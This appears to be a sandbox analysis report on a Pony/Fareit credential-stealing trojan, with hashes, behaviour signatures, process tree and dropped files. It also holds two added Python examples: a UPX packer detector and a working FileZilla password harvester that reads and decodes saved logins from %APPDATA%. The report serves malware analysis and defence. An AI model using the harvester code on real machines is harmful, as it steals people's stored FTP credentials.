Analysis

  • max time kernel
    142s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    01/02/2024, 02:17

General

  • Target

    82a288eea617ea4bda22817e3e6509c7.exe

  • Size

    273KB

  • MD5

    82a288eea617ea4bda22817e3e6509c7

  • SHA1

    4a238899b0c921540f30f7129312e9f928ab1038

  • SHA256

    45fd11c98bde6bc2670c73ab890cc623b6784632c535eb19d0dae3ebc8ce0408

  • SHA512

    1c4d3332dd42da74328b087aa40a328887e558360e36bfde7bd458e2ed532936eba33f302caceba0c92634376d820fb43a66c563150f254e52c088e10c65bf5e

  • SSDEEP

    6144:3jcANL1wec32khosSqIh6hRAQTmNtfPO5W18t4A6jWB8T3Kc:3jP+ecFhohhhORr+VPm48t5ibt

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Pony,Fareit

    Pony (also tracked as Fareit) is a credential-stealing trojan rather than a remote-access tool: it harvests saved logins from web browsers, FTP clients and other applications, and is commonly used to fetch additional payloads. The FTP-client and browser-profile reads listed below are that credential harvesting.

  • Disables taskbar notifications via registry modification
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers commonly read stored browser profile data such as saved credentials, cookies and autofill entries.

  • UPX packed file 7 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX variant.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 3 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
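The "UPX packed file" signature above rests on two pieces of evidence a reader can check by hand: UPX leaves sections named UPX0/UPX1, and even when those names are patched out, the first section has SizeOfRawData of zero but a large VirtualSize (the decompression target). The following is an added example, not code from the sandbox or from the Pony family: a standard-library PE section-table reader that applies both checks. The PE images it parses are constructed in memory (header-only, no code) so it runs offline; the "packed" layout is only loosely modelled on this report (273KB on disk, a 0x400000-0x46D000 region once mapped), and `build_fake_pe`, `packer_verdict` and the sample names are this example's own.

```python
"""Added example, not code from the sandbox report or from Pony itself."""
import struct

# Section names UPX (and the common renamed variants) leave behind.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".UPX0", ".UPX1"}


def parse_sections(data: bytes) -> list:
    """Return the PE section table as dicts with name, virtual_size, raw_size."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    file_hdr = e_lfanew + 4                      # IMAGE_FILE_HEADER is 20 bytes
    num_sections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    size_of_opt = struct.unpack_from("<H", data, file_hdr + 16)[0]
    table = file_hdr + 20 + size_of_opt          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        # First 20 bytes of each 40-byte IMAGE_SECTION_HEADER:
        # Name[8], VirtualSize, VirtualAddress, SizeOfRawData
        name, vsize, vaddr, rawsize = struct.unpack_from("<8sIII", data, table + i * 40)
        sections.append({
            "name": name.rstrip(b"\x00").decode("latin-1"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": rawsize,
        })
    return sections


def packer_verdict(data: bytes) -> str:
    """'upx-section-names', 'empty-first-section' (renamed UPX layout) or 'none'."""
    sections = parse_sections(data)
    if any(s["name"] in UPX_SECTION_NAMES for s in sections):
        return "upx-section-names"
    # UPX0 holds no file bytes but reserves the virtual span the unpacked code lands in.
    if sections and sections[0]["raw_size"] == 0 and sections[0]["virtual_size"] >= 0x1000:
        return "empty-first-section"
    return "none"


def build_fake_pe(sections) -> bytes:
    """Construct a header-only PE32 image (no code) for offline testing."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE header right after DOS header
    # Machine=i386, NumberOfSections, three zeroed fields, SizeOfOptionalHeader=0xE0, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt_hdr = b"\x0b\x01" + b"\x00" * (0xE0 - 2)  # PE32 magic, remainder zeroed
    table = b""
    for i, (name, vsize, rawsize) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name, vsize, 0x1000 * (i + 1), rawsize,
                             0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + opt_hdr + table


# Constructed samples (not real files): a UPX layout, the same layout with the
# section names scrubbed, and an ordinary compiler layout.
PACKED_SAMPLE = build_fake_pe([(b"UPX0", 0x6D000, 0), (b"UPX1", 0x21000, 0x20A00), (b".rsrc", 0x1000, 0x400)])
RENAMED_SAMPLE = build_fake_pe([(b".text", 0x6D000, 0), (b".data", 0x21000, 0x20A00)])
CLEAN_SAMPLE = build_fake_pe([(b".text", 0x5000, 0x5000), (b".data", 0x1000, 0x200), (b".rsrc", 0x400, 0x400)])

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("renamed", RENAMED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, [s["name"] for s in parse_sections(blob)], "->", packer_verdict(blob))
```

To triage a real sample, pass `open(path, "rb").read()` to `packer_verdict`. Neither heuristic is proof on its own: the name check is trivially evaded and the empty-first-section check also fires on some legitimate self-extracting installers, so treat a hit as a reason to unpack and look, not as a verdict.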
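The "Reads data files stored by FTP clients" signature names FileZilla, and it is worth seeing why that read matters. FileZilla keeps recent and saved servers in sitemanager.xml and recentservers.xml under %APPDATA%\FileZilla, and stores the password either base64-encoded (current builds) or in plain text (older builds); both are trivially reversible, so reading those two files is the whole theft. The following is an added example, not code from the report or from Pony: a parser that recovers the logins the way a stealer would. The XML is a constructed sample, the `C:\Users\Admin\AppData\Roaming` fallback only mirrors the sandbox user seen in this report, and `harvestable` and `decode_password` are names chosen here.

```python
"""Added example, not code from the sandbox report or from Pony itself."""
import base64
import os
import xml.etree.ElementTree as ET

# FileZilla's <Protocol> numbering for the two values that matter here.
PROTOCOLS = {"0": "ftp", "1": "sftp"}

# Constructed sample in the shape of recentservers.xml; not data from this run.
SAMPLE_RECENTSERVERS = """<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>webadmin</User>
      <Pass encoding="base64">UEBzc3cwcmQh</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>legacy.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass>legacy-plain</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>keys.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>ci</User>
      <Logontype>5</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def filezilla_config_paths() -> list:
    """The two files a stealer reads on a live Windows host (fallback path is illustrative)."""
    appdata = os.environ.get("APPDATA", r"C:\Users\Admin\AppData\Roaming")
    return [os.path.join(appdata, "FileZilla", name)
            for name in ("sitemanager.xml", "recentservers.xml")]


def decode_password(pass_el):
    """Reverse FileZilla's storage encoding; None when nothing recoverable is saved."""
    if pass_el is None or not pass_el.text:
        return None
    encoding = pass_el.get("encoding")
    if encoding is None:
        return pass_el.text                      # older builds wrote it verbatim
    if encoding == "base64":
        return base64.b64decode(pass_el.text).decode("utf-8", "replace")
    return None                                  # any other encoding (e.g. master-password protected) is not reversible offline


def extract_credentials(xml_text: str) -> list:
    """One record per <Server>; the same element name is used in both config files."""
    root = ET.fromstring(xml_text)
    found = []
    for server in root.iter("Server"):
        found.append({
            "host": server.findtext("Host", ""),
            "port": int(server.findtext("Port", "0")),
            "protocol": PROTOCOLS.get(server.findtext("Protocol", ""), "other"),
            "user": server.findtext("User", ""),
            "password": decode_password(server.find("Pass")),
        })
    return found


def harvestable(creds) -> list:
    """Only the entries with a recoverable secret, i.e. what would actually leave the host."""
    return [c for c in creds if c["password"] is not None]


if __name__ == "__main__":
    for c in harvestable(extract_credentials(SAMPLE_RECENTSERVERS)):
        print(f'{c["protocol"]}://{c["user"]}@{c["host"]}:{c["port"]} password={c["password"]!r}')
```

The defensive takeaway: key-file logins (the third entry) yield nothing, and FileZilla's optional master password encrypts the stored value so that a plain read of the file is no longer enough; entries saved without it are as good as cleartext to anything running in the user's session.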

Processes

  • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
    "C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe"
    1⤵
    • Modifies security service
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2088
    • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
      C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe startC:\Users\Admin\AppData\Roaming\D614A\FEB07.exe%C:\Users\Admin\AppData\Roaming\D614A
      2⤵
        PID:932
      • C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe
        C:\Users\Admin\AppData\Local\Temp\82a288eea617ea4bda22817e3e6509c7.exe startC:\Program Files (x86)\4A9C1\lvvm.exe%C:\Program Files (x86)\4A9C1
        2⤵
          PID:2036
        • C:\Program Files (x86)\LP\07BD\8D90.tmp
          "C:\Program Files (x86)\LP\07BD\8D90.tmp"
          2⤵
          • Executes dropped EXE
          PID:1336
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:904

      Network

            MITRE ATT&CK Enterprise v15


            Downloads

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614

              Filesize

              996B

              MD5

              3f4db16f7bbbc701dfdb12d8d77c47c0

              SHA1

              ee9cfc8a7bdc67f394171d13b1efb2bffca9c15a

              SHA256

              1bd88056729b61dc16bc7d97334b71a729f2da9ae931a5bb501f87b6462ffef9

              SHA512

              0e71393e6eac3637449629841ff75f9446cdcdef3e1caeed6e6043c289eaefe62b93948d6b2e21a65d2c021c06c09abe26e04ec502533e8b8876cb16476e3427

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614

              Filesize

              1KB

              MD5

              afe0aa72c4afe0dece66048333586f7c

              SHA1

              dd0491778d4f615bc93fc90ddb6abbdcc51af0be

              SHA256

              2593f23de25ea331459d65b3a629d1ed1735c216ca0c88dba9fa1c3cad7e76b6

              SHA512

              0e0c065e5a2792ff03bc69dd658e1208651eed4d371b63ddb57f945a9333a8aa6edae8ab01ab61e6dc82735cf5494383dbbf57f4737f123d57764b3a298e039f

            • C:\Users\Admin\AppData\Roaming\D614A\A9C1.614

              Filesize

              600B

              MD5

              cf811889e6025da955101d8434a92105

              SHA1

              c633809a6195971f133f1f9674371f68c0d4e6c3

              SHA256

              18837a7174fe089e1f7c778007a9c38ea749b5ea1b5678622f53719bdc4be2ff

              SHA512

              6fdb5132d8dca74919ddc1480c06c480d1159bf5bcb7dcc9edba26bf536ec9ff9d55434fd93d3d92723a66a640592b2985059aab3116abb54330b2aa71e738eb

            • \Program Files (x86)\LP\07BD\8D90.tmp

              Filesize

              105KB

              MD5

              1c2bce0519de8357c7cb082d1be5ef2d

              SHA1

              d6619d654247eab6ea0e15b935e51d6048ab61fd

              SHA256

              89b05808a3d33c0cc66d7ea408fd51021e014361ec0743d12d2b9c158265ec9c

              SHA512

              c7673ebba591e5e6ca9c7d93dd51ec1c92ed2ad215cf20ed4b62abff9ee54117326118ff8c0c78e6028ea4b70b62a7c1648112ebbed5c6428558d366819c876e

            • memory/904-339-0x00000000043F0000-0x00000000043F1000-memory.dmp

              Filesize

              4KB

            • memory/904-317-0x00000000043F0000-0x00000000043F1000-memory.dmp

              Filesize

              4KB

            • memory/932-13-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/932-14-0x0000000001CA0000-0x0000000001CE6000-memory.dmp

              Filesize

              280KB

            • memory/1336-337-0x0000000000400000-0x000000000041D000-memory.dmp

              Filesize

              116KB

            • memory/1336-335-0x00000000004C0000-0x00000000005C0000-memory.dmp

              Filesize

              1024KB

            • memory/1336-334-0x0000000000400000-0x000000000041D000-memory.dmp

              Filesize

              116KB

            • memory/2036-144-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/2036-145-0x0000000001CD0000-0x0000000001D16000-memory.dmp

              Filesize

              280KB

            • memory/2088-11-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/2088-2-0x0000000000470000-0x0000000000570000-memory.dmp

              Filesize

              1024KB

            • memory/2088-142-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/2088-336-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/2088-146-0x0000000000470000-0x0000000000570000-memory.dmp

              Filesize

              1024KB

            • memory/2088-1-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB

            • memory/2088-341-0x0000000000400000-0x000000000046D000-memory.dmp

              Filesize

              436KB